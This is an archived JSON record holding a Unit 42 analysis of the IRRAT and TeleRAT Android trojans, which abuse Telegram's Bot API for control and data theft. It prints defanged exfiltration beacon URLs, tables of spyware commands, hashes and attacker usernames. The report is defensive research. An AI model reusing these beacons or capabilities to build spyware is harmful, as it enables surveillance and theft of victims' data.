{
	"id": "f05e00c7-7a61-45fd-85f3-3b609c3484c6",
	"created_at": "2026-04-06T00:19:28.695418Z",
	"updated_at": "2026-04-10T13:12:25.935389Z",
	"deleted_at": null,
	"sha1_hash": "ab81e2e225d3aae93d5e9f25c30613f813834015",
	"title": "TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1431471,
	"plain_text": "TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API\r\nto Target Iranian Users\r\nBy Ruchna Nigam, Kyle Wilhoit\r\nPublished: 2018-03-20 · Archived: 2026-04-05 15:32:12 UTC\r\nSummary\r\nTelegram Bots are special accounts that do not require an additional phone number to set up and are generally used\r\nto enrich Telegram chats with content from external services or to get customized notifications and news. And\r\nwhile Android malware abusing Telegram's Bot API to target Iranian users is not fresh news (the emergence of a\r\nTrojan using this method called IRRAT was discussed in June and July 2017), we set out to investigate how these\r\nTelegram Bots were being abused to command and control malicious Android applications.\r\nThis blog details our findings navigating through some Operational Security (OPSEC) fails while sifting through\r\nmultiple malicious APK variants abusing Telegram's Bot API, including the discovery of a new Trojan we've\r\nnamed “TeleRAT”. TeleRAT not only abuses Telegram's Bot API for Command and Control (C2), it also abuses it\r\nfor data exfiltration, unlike IRRAT.\r\nWhat We Already Know: IRRAT\r\nBased on previous reports, we know Telegram's Bot API was already being employed by attackers to steal\r\ninformation ranging from SMS and call history to file listings from infected Android devices. 
The majority of the\r\napps we saw disguise themselves as an app that tells you how many views your Telegram profile received –\r\nneedless to say, the information provided is inaccurate as Telegram doesn’t allow for populating any such\r\ninformation.\r\nWe continue to see IRRAT active in the wild to this date.\r\nWe used the below sample for this analysis.\r\nSHA256 1d0770ac48f8661a5d1595538c60710f886c254205b8cf517e118c94b256137d\r\nTeleRAT works by creating and then populating the following files on the phone’s SD Card and sending them to\r\nthe upload server, after the app’s first launch:\r\n“[IMEI] numbers.txt”: Contact information\r\n“[IMEI]acc.txt”: List of Google accounts registered on the phone\r\n“[IMEI]sms.txt”: SMS history\r\n1.jpg: Picture taken with the front-facing camera\r\nImage.jpg: Picture taken with back-facing camera\r\nFinally, it reports back to a Telegram bot (identified by a bot ID hardcoded in each RAT’s source code) with the\r\nbelow beacon, and the application icon is then hidden from the phone's app menu:\r\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\r\nPage 1 of 12\n\nhxxp://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]?text=نصب جدید [IMEI]\\nIMEI : [IMEI]\\nAndroid ID : [AndroidID]\\nModel : [PhoneModel]\\n[IP]\\n\\nIMEI دستگاه: [IMEI]\r\nIn the background, the app continues to beacon to the Telegram bot at regular intervals and listens for certain\r\ncommands, as detailed below.\r\nCommand | Action | Communication to Telegram bot\r\ncall@[IMEI]@[Number] | Places a call to [Number] | hxxps://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]\u0026text=call with [Number]\r\nsms@[IMEI]@[Number]@[Text] | SMS [Text] to [Number] | hxxps://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]\u0026text=sent\r\ngetapps@[IMEI] | Saves a list of installed apps to SD Card to file named “[IMEI]apps.txt”, uploads to upload server | None\r\ngetfiles@[IMEI]@[DirPath] | Retrieves file listing from [DirPath], saves to SD Card as “[IMEI]files.txt”, uploads to server | None\r\ngetloc@[IMEI] | Starts a GPS listener that monitors location changes | None\r\nupload@[IMEI]@[FilePath] | Uploads file at [FilePath] | None\r\nremoveA@[IMEI]@[FilePath on SDCard] | Deletes file at [FilePath on SDCard] | https://api.telegram.org/bot[APIKey]/sendmessage?chat_id=[ChatID]\u0026text= ______________[FilePath on SDCard]\r\nremoveB@[IMEI]@[DirPath on SDCard] | Deletes [DirPath on SDCard] | None\r\nlstmsg@[IMEI] | Saves SMS history to SD Card as “[IMEI]lstmsg.txt”, uploads to server | None\r\nyehoo@[IMEI] | Takes a picture with Front Camera, saves to SD Card as “yahoo.jpg”, uploads to server | None\r\nTable 1: List of IRRAT bot commands\r\nAs the table above shows, this IRRAT sample makes use of Telegram's bot API solely to communicate commands\r\nto infected devices. The stolen data is uploaded to third party servers, several of which employ a webhosting\r\nservice. Fortunately for us, these servers had several OPSEC fails. More on that further below.\r\nA New Family: TeleRAT\r\nWhile sifting through IRRAT samples, using AutoFocus, we came across another family of Android RATs\r\nseemingly originating from and/or targeting individuals in Iran that not only makes use of the Telegram API for\r\nC2 but also for exfiltrating stolen information.\r\nFigure 1: Pivoting in AutoFocus for applications using the Telegram bot API\r\nWe named this new family “TeleRAT” after one of the files it creates on infected devices.\r\nWe used the below sample for this analysis.\r\nSHA256 01fef43c059d6b37be7faf47a08eccbf76cf7f050a7340ac2cae11942f27eb1d\r\nPost-installation TeleRAT creates two files in the app’s internal directory:\r\ntelerat2.txt containing a slew of information about the device, including the System Bootloader version\r\nnumber, total and available Internal and External memory size, and number of cores.\r\nthisapk_slm.txt mentioning a Telegram channel and a list of commands. We investigate this Telegram\r\nchannel in greater detail further below.\r\nThe RAT announces its successful installation to the attackers by sending a message to a Telegram bot via the\r\nTelegram Bot API with the current date and time.\r\nMore interestingly, it starts a service that listens for changes made to the Clipboard in the background.\r\nFigure 2: Code snippet that listens for clipboard changes\r\nFinally, the app fetches updates from the Telegram bot API every 4.6 seconds, listening for the following\r\ncommands (we used Google Translate for the below Farsi (Persian) translations):\r\nCommand | Translation\r\nدریافت مخاطبین | Get contacts\r\nدریافت کلیپ بورد | Get the clipboard\r\nClipboard set:[text]\r\nدریافت مکان | Get location\r\nدریافت اطلاعات شارژ | Receive charging information\r\nAll file list:/[path]\r\nRoot file list:/[path]\r\nدریافت برنامه ها | Get apps\r\n1Downloadfile/[filename]\r\n2Downloadfile/[filename]\r\nCreateContact/[name]/[number]\r\nSetWallpaper http[URL]\r\nدریافت پیام ها | Receive (SMS) messages\r\nSendsmsfor/[destination]/[text]\r\nMessageShow[text]\r\nعکس گرفتن 1 | Take photo 1 (front camera)\r\nعکس گرفتن 2 | Take photo 2 (back camera)\r\nدریافت وضعیت | Get status\r\nدریافت تماس ها | Receive calls\r\nDeleteDir[dirname]\r\nسایلنت | Silent (set to Vibrate mode)\r\nصدادار | Loud (set to normal Ringer mode)\r\nبیصدا | Silent (set to Silent mode)\r\nBlacksc | Blacks out phone screen\r\nBlackscf | Clears black screen\r\nضبط فیلم | Audio recording (saves recorded audio to AUDIO123/MUSIC/rec123.m4a on SD Card)\r\nتوقف ضبط فیلم | Stop audio recording\r\nراهنمای دستورات | Instruction manual (Help Menu)\r\ncall to [number]\r\nRESET | Deletes thisapk_slm.txt and sends a new registration message to Telegram bot\r\nدریافت گالری | Get gallery (sends files from the /Dcim folder on the SD Card to Telegram bot)\r\nDelete app files or گالری دریافت\r\nVibrate [x] | Causes phone to vibrate for x seconds, with a maximum value of 600 secs\r\nلرزش کم | Low vibration (for a duration of 150 secs)\r\nلرزش متوسط | Medium vibration (350 secs)\r\nلرزش زیاد | Shake too much (600 secs)\r\nTable 2: List of TeleRAT bot commands\r\nAside from additional commands, this new family’s main differentiator to IRRAT is that it also uploads exfiltrated\r\ndata using Telegram's sendDocument API method.\r\nFigure 3: Code snippet showing the use of the SendDocument Telegram bot API method\r\nTeleRAT is an upgrade from IRRAT in that it eliminates the possibility of network-based detection that is based on\r\ntraffic to known 
upload servers, as all communication (including uploads) is done via the Telegram bot API.\r\nHowever, it still leaves other doors open via Telegram's bot API, since the API Keys are hardcoded in the APKs.\r\nThe API allows fetching updates by two means:\r\n1. The getUpdates method: Using this exposes a history of all the commands that were sent to the bot, including\r\nusernames from which the commands originated. From the bots that were still responding and had an update\r\nhistory (incoming updates are only kept for 24 hours as per Telegram's policy), we were able to find bot\r\ncommands originating from four Telegram accounts, shown below.\r\nFigure 4: Telegram usernames revealed from bot command histories\r\n2. Using a Webhook: Telegram allows redirecting all bot updates to a URL specified by means of a Webhook.\r\nTheir policy limits these Webhooks to HTTPS URLs only. While most of the Webhooks we found used\r\ncertificates issued by Let’s Encrypt with no specific registrar information, some of them led us back to the world\r\nof third party webhosting and open directories. Let’s Encrypt has been notified about this activity.\r\nA sample of only a few of the Webhooks we found is shown below. 
hxxps://mr-mehran[.]tk/pot/Bot/ in particular\r\nappears to be hosting close to 6500 bots; however, we can’t confirm whether they’re all used for malicious\r\npurposes.\r\nFigure 5: Webhooks found associated with some TeleRAT bots\r\nOPSEC Fails, Distribution Channels \u0026 Attribution\r\nIn our research we were able to find what was clearly an image of the botmaster testing out the RAT, based on the\r\nTelegram bot interface that can be seen on the monitor pictured in the lower half of Figure 6.\r\nFigure 6: Image of botmaster testing out the RAT\r\nWe were also able to find exfiltrated messages that confirmed our theory about the test run and reveal a thread in\r\nPersian (Farsi) seemingly discussing bot setup.\r\n“صبح ساعت ۶ انالین شو تا روباته رو امتحان کنیم”\r\nGoogle Translation: “Morning 6 hours online to try the robotage”\r\nWhile investigating attribution for TeleRAT, we noticed the developers made no effort to hide their identities in\r\nthe code. 
One username is seen in the screenshot below.\r\nFigure 7: Telegram channel advertised in source code\r\nLooking further into the ‘vahidmail67’ Telegram channel, we found advertisements for applications and builders\r\nthat ran the entire gamut, from applications that get you likes and followers on Instagram, to ransomware, and\r\neven the source code for an unnamed RAT (complete with a video tutorial, shown below).\r\nFigure 8: Screenshot from a Telegram channel advertising \u0026 sharing a RAT source code\r\nAside from the Telegram channel, while looking for references to certain TeleRAT components we stumbled upon\r\nsome threads on an Iranian programmers’ forum advertising the sale of a Telegram bot control library. The forum\r\nis frequented by some of the developers whose code is heavily reused in a big portion of the TeleRAT samples we\r\ncame across.\r\nFigure 9: Advertisement for sale of a Telegram bot control library\r\nThe forum goes the extra mile to mention all content is in accordance with Iran's laws. 
However, it's hard to see\r\nany non-malicious use for some of the code advertised there or written by developers that frequent it – for\r\ninstance, a service that runs in the background listening for changes to the Clipboard (pictured in the code snippet\r\nin Figure 3 further above).\r\nFigure 10: Forum Disclaimer\r\nOverall, TeleRAT pieces together code written by several developers. However, because the source code is freely\r\navailable via Telegram channels and is sold on forums, we can’t point to one single actor commanding either IRRAT or\r\nTeleRAT; it appears to be the work of several actors, possibly operating inside Iran.\r\nVictimology\r\nAs we investigated these RATs, we also started looking at how victims were getting infected. Further\r\ninvestigating, we witnessed several third-party Android application stores distributing seemingly legitimate\r\napplications like \"Telegram Finder\", which supposedly helps users locate and communicate with other users with\r\nspecific interests, like knitting. 
Also, we've witnessed several samples distributed and shared via both legitimate\r\nand nefarious Iranian Telegram channels.\r\nFigure 11: Iranian third-party application store\r\nLooking closer at the malicious APKs we were able to get an understanding of common application naming\r\nconventions and functionality across the board.\r\nFigure 12: 'Telegram finder' application\r\nBased on the samples we analysed, the three most common application names for both IRRAT and TeleRAT are:\r\nNative App Name | Translated App Name\r\nپروفایل چکر | Profile Checker\r\nبازدید یاب تلگرام | Telegram Finder\r\ntelegram hacker | N/A\r\nAdditionally, there were several malicious APKs disguised as fake VPN software and/or configuration files, such\r\nas \"atom vpn\" and \"vpn for telegram\".\r\nThere appears to be a total identified victim count of 2,293 at the time of writing, based on the infrastructure we\r\nanalysed. There appears to be a rather small range of geographically dispersed victims, with 82% having\r\nIranian phone numbers.\r\nCountry | Victims\r\nIran | 1894\r\nPakistan | 10\r\nIndia | 227\r\nAfghanistan | 109\r\nUnited Kingdom | 53\r\nThere may also be additional infrastructure or variants we were unaware of at the time of writing. That said, the\r\nnumber of victims likely residing within Iran far exceeds the victim count for any other country.\r\nConclusion\r\nPart of dissecting and understanding new threats involves looking closer at already established campaigns and\r\nmalware variants. 
This is a perfect example of just that: looking closer at a previously established malware family\r\nto better understand its current and possibly changed capabilities.\r\nWhile malware leveraging the Telegram bot API is not necessarily new, we were able to identify a new family,\r\nTeleRAT, hiding entirely behind Telegram's API to evade network-based detection and exfiltrate data. Leveraging\r\nintelligence from AutoFocus, accessible attacker infrastructure, and other open source intelligence we were able to\r\npaint an accurate picture of an ongoing operation leveraging Telegram's API and targeting users via third party\r\napplication sites and social media channels.\r\nTaking some basic precautions can help users protect themselves from malicious applications like TeleRAT, such\r\nas:\r\nAvoid third-party application stores or sources.\r\nDon't allow application sideloading on your device.\r\nEnsure the application you are installing is official, regardless of source.\r\nClosely review and scrutinize application permission requests prior to installation.\r\nPalo Alto Networks customers are protected from this threat by:\r\n1. WildFire detects all TeleRAT and IRRAT files with malicious verdicts.\r\n2. AutoFocus customers can track these samples with the IRRAT and TeleRAT\r\n3. 
Traps blocks all of the APK files associated with TeleRAT and IRRAT.\r\nAPPENDIX\r\nTelegram usernames found commanding IRRAT or TeleRAT\r\nAhmad_ghob\r\nMy_LiFe_M_a_H_s_A\r\nmmm1230a\r\nWebhooks\r\nSource: https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/"
	],
	"report_names": [
		"unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users"
	],
	"threat_actors": [],
	"ts_created_at": 1775434768,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ab81e2e225d3aae93d5e9f25c30613f813834015.pdf",
		"text": "https://archive.orkl.eu/ab81e2e225d3aae93d5e9f25c30613f813834015.txt",
		"img": "https://archive.orkl.eu/ab81e2e225d3aae93d5e9f25c30613f813834015.jpg"
	}
}